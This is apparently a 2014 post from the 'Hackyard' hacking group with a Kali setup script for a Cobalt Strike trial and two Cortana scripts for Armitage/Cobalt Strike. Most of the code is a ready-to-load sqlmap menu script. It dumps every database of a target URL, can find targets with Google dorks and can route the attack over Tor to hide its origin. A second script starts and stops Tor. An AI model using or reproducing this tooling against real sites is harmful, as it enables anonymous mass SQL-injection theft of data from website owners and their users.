Hackyard Cobaltstrike Cortana Script Project

Zmeus · February 27, 2014

What is Cobalt Strike?

Cobalt Strike is penetration testing software designed to execute targeted attacks.

What does Cobalt Strike add to Armitage?

Cobalt Strike adds social engineering features to get a foothold, covert command and control with Beacon, browser pivoting, and reporting to Armitage's existing post-exploitation and team collaboration capabilities.

Who is Cobalt Strike for?

Cobalt Strike is made by red team penetration testers, and consultants who need to act like a sophisticated threat.

Help and instruction installation for cobaltstrike :

Install on Kali Linux - Cobalt Strike

0x0A created a little and simple script for this.Using this script only the first time and then delete it:

For first time:

Open up a text editor (e.g. ALT+F2 gedit) and paste in:

#!/bin/bash
#this simple script will be downloading the cobaltstrike, unpacking the tar file
#creating a launcher for cobalt,run the services postgresql and metasploit
#writed by 0x0A
echo -e " \e[00;32mHello Mr.$USER . Be pround to become a Hackyard member!\e[00m"
sleep 3
echo " Downloading the cobaltstrike trial version"
gnome-terminal -x wget http://www.advancedpentest.com/downloads/4656e23fa6b9af581676b9ea6752a1d3/cobaltstrike-trial.tgz 
echo " Cobaltstrike trial version is downloaded"
sleep 3
    echo ""
echo " Now extracting the compresed tar file"
gnome-terminal -x tar zxvf cobaltstrike-trial.tgz
sleep 3
echo " All tar files extracted with success!"
sleep 3
    echo ""
echo " Creating launcher for cobaltstrike"
echo "java -XX:+AggressiveHeap -XX:+UseParallelGC -jar /root/cobaltstrike/cobaltstrike.jar $*"> /root/cobalt
mv cobalt /usr/bin/ && chmod +x /usr/bin/cobalt
echo " The cobaltstrike launcher is ready !"
sleep 2
    echo""
echo " Starting the postgresql service"
service postgresql start
sleep 2
echo -e" \e[00;32mPostgresql service is loaded\e[00m"
sleep 3
    echo ""
echo " Starting the metasploit service"
service metasploit start
sleep 2 
echo -e " \e[00;32mMetasploit services is loaded\e[00m"
sleep 3
    echo ""
echo " The system is ready for action "
sleep 3
echo -e " Now loading the cobaltstrike and \e[00;32mremember\e[00m"
sleep 3
echo -e " \e[00;32mHACKYARD TEAM IS WITH YOU\e[00m"
sh -c "cobalt;${SHELL:-bash}"

Save the file as "load" in your root folder.

Now you need to make it executable, so open up a terminal and enter

chmod +x load and run the script ./load

FINAL SCRIPT:

Open up a text editor (e.g. ALT+F2 gedit) and paste in:

#!/bin/bash
#run the services postgresql and metasploit and in the end cobaltstrike 
#writed by 0x0A 
#!/bin/bash
echo " Starting the postgresql service"
service postgresql start
sleep 2
echo -e" \e[00;32mPostgresql service is loaded\e[00m"
sleep 3
    echo ""
echo " Starting the metasploit service"
service metasploit start
sleep 2 
echo -e " \e[00;32mMetasploit services is loaded\e[00m"
sleep 3
    echo ""
echo " The system is ready for action "
sleep 3
echo -e " Now loading the cobaltstrike and \e[00;32mremember\e[00m"
sleep 3
echo -e " \e[00;32mHACKYARD TEAM IS WITH YOU\e[00m"
sh -c "cobalt;${SHELL:-bash}"

Save the file as "msf" in your root folder

Now you need to make it executable, so open up a terminal and type in:

chmod +x msf

To create a desktop launcher, open up a text editor (e.g. ALT+F2 gedit) and paste in:

[Desktop Entry]
Version=1.0
Name=cobaltstrike
Description=cobaltstrike launcher
Comment=Proud to be member of hackyard
Exec=sh /root/msf
Icon=/root/cobaltstrike/icon.jpg
Terminal=true
Type=Application
Categories=Utility;Application;

Save the file as "cobaltstrike.desktop" in your Desktop folder (~/Desktop).

Now you need to make it executable, so open up a terminal and enter

chmod +x cobaltstrike.desktop

Now is ready for action!!

What is Cortana Scripts?

Raphael Mudge the developer of Armitage released the most significant update to Armitage. Armitage is now fully scriptable and capable of hosting bots in a collaborative hacking engagement.

Using Cortana, you may develop stand-alone bots that join your red team. Cortana bots scan hosts, launch exploits, and work on compromised hosts without stepping on each other or getting in the way of their human teammates.

Cortana scripts may also extend the Armitage and Cobalt Strike clients with new features. Cortana scripts can expose hidden Metasploit features, integrate third-party tools and agents, or control other Cortana bots.

For more information: https://github.com/rsmudge/cortana-scripts

HACKYARD TEAM COLABORATION

The hackyard security group created a little cortana script for web attack to sqlmap with some functions:

- SQL Injection attack with sqlmap
- SQL Injection attack with sqlmap over Tor-Network
- SQL Injection attack with GoogleDork
- SQL Injection attack with GoogleDork over TOR-Network
- GoogleDork list

The hackyard team created a little cortana script for attack over Tor-Network with some functions:

- Start TOR service
- Stop TOR service
- Restart TOR service

Now here is the simple sourcecode of both scripts:

SQLMAP CORTANA SCRIPT

Open up a text editor (e.g. ALT+F2 gedit) and paste in:

# Copyright © Hackyard Securty Group 2014 All Rights Reserved. 
# Coded by 0x0A and nullbyte / members of Hackyard Security Group 
# Cortana SQLMAP Script with Google Dorks over TOR-Network.
# https://hackyard.net
# Project leader e-mail : ps-axl[dot]hackyard.net

println("\n-----------------------------------------------\n\c4
[*] HACKYARD SQLMAP SCRIPT LOADED 
[*]\n-----------------------------------------------");

menubar("Web Attacks", "webpopups",2);

popup webpopups {
menu "Sqlmap" {
item "Injection" {

$ip = prompt_text("Please set the target and options");
if
($ip !is $null) {
show_message("I'll show you the hackyard power!");
        println("\n-----------------------------------------------\n\c4Injection\c4 with Sqlmap\nIP: \c9$ip\c9 \n-----------------------------------------------");    
    $console = console();
    cmd($console, "gnome-terminal -x sqlmap -u $ip --dump-all --thread=10 --level=2 --risk=2 --random-agent ;bash");
        db_sync()
}
}
item "Injection over Tor" {

$ip = prompt_text("Please set the target and options");
if
($ip !is $null) {
show_message("I'll show you the hackyard power!");
        println("\n-----------------------------------------------\n\c4Injection\c4 with Sqlmap over Tor-Network\nIP: \c9$ip\c9 \n-----------------------------------------------");    
    $console = console();
    cmd($console, "gnome-terminal -x sqlmap -u $ip --dump-all --thread=10 --level=2 --risk=2 --random-agent --tor --tor-type=socks5 --tor-port=9050 ;bash");
    db_sync()
}
}
item "Injection with GooogleDork" {

$ip = prompt_text("Please set the target and options + GoogleDork");
if
($ip !is $null) {
show_message("I'll show you the hackyard power!");
        println("\n----------------------------------------\n\c4Injection\c4 with Sqlmap with GoogleDorks\nIP: \c9$ip\c9 \n----------------------------------------");    
    $console = console();
    cmd($console, "gnome-terminal --display=sqlmap -u $ip --dbs --thread=10 --level=2 --risk=2 --random-agent -g ;bash");
    db_sync()
}
}
item "Injection with GoogleDork over Tor" {

$ip = prompt_text("Please set the target and options + GoogleDork");
if
($ip !is $null) {
show_message("I'll show you the hackyard power!");
        println("\n----------------------------------------\n\c4Injection\c4 with Sqlmap using Google Dorks over Tor-Network\nIP: \c9$ip\c9 \n----------------------------------------");    
    $console = console();
    cmd($console, "gnome-terminal -x sqlmap -u $ip --dump-all --thread=10 --level=2 --risk=2 --random-agent --tor --tor-type=socks5 --tor-port=9050 -g ;bash");
    db_sync()
}
}
item "GoggleDorks List" {
url_open("http://pastebin.com/raw.php?i=CwtPuQzV");
}
}
}

Save the file with name sqlmap.cna

Load the cobaltstrike and run scripts > click on load and select the sqlmap.cna

Click on console tab and type logon sqlmap.cna.Now is ready for action:

TOR-NETWORK CORTANA SCRIPT

Open up a text editor (e.g. ALT+F2 gedit) and paste in:

# Copyright © Hackyard Securty Group 2014 All Rights Reserved.
# Coded by 0x0A and nullbyte members of Hackyard Security Group 
# Cortana SQLMAP Script with Google Dorks over TOR.
# https://hackyard.net
# Project leader e-mail : ps-axl[dot]hackyard.net 
println("\n----------------------------------------\n\c4
[*] HACKYARD TOR-NETWORK SCRIPT LOADED 
[*] \n----------------------------------------");
menubar("Web Attacks", "webpopups",2);

popup webpopups {
menu "Tor Engine" {
item "Start Tor" {
        println("\n----------------------------------------\n\c4Starting\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");    
    $console = console();
    $console = open_console_tab("Start Tor NetWork");
    cmd($console, "gnome-terminal -x service tor start && service tor status");
    #sleep(30 * 1000);
    db_sync()
}
item "Kill Tor" {
        println("\n----------------------------------------\n\c4Stop\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");    
    $console = console();
    $console = open_console_tab("Kill Tor NetWork");
    cmd($console, "gnome-terminal -x service tor stop && service tor status");
    #sleep(30 * 1000);
    db_sync()
}
item "Restart Tor" {
        println("\n----------------------------------------\n\c4Restart\c4 Tor-Network\nIP: \c9127.0.0.1:9050\c9 \n----------------------------------------");    
    $console = console();
    $console = open_console_tab("Restart Tor NetWork");
    cmd($console, "gnome-terminal -x service tor restart && service tor status");
    #sleep(30 * 1000);
    db_sync()
}
}
}